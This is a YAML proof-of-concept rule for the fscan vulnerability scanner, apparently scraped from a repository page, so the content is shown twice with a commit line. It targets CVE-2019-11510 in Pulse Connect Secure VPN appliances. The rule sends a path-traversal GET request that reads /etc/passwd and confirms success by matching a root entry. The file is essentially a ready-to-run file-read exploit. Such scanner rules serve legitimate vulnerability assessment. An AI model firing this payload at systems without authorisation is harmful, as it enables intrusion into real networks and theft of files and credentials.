fscan/Web_Scan/pocs/pulse-cve-2019-11510.yml

name: poc-yaml-pulse-cve-2019-11510
rules:
  - method: GET
    path: >-
      /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/
    follow_redirects: false
    expression: |
      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
  author: leezp
  Affected Version: "Pulse Connect Secure:  9.0RX  8.3RX  8.2RX"
  links:
    - https://github.com/jas502n/CVE-2019-11510-1
    - https://github.com/projectzeroindia/CVE-2019-11510
优化xray解析模块,支持groups、新增poc 2021-11-15 19:53:46 -08:00			`name: poc-yaml-pulse-cve-2019-11510`
			`rules:`
			`- method: GET`
			`path: >-`
			`/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/`
			`follow_redirects: false`
			`expression: \|`
			`response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)`
			`detail:`
			`author: leezp`
			`Affected Version: "Pulse Connect Secure: 9.0RX 8.3RX 8.2RX"`
			`links:`
			`- https://github.com/jas502n/CVE-2019-11510-1`
			`- https://github.com/projectzeroindia/CVE-2019-11510`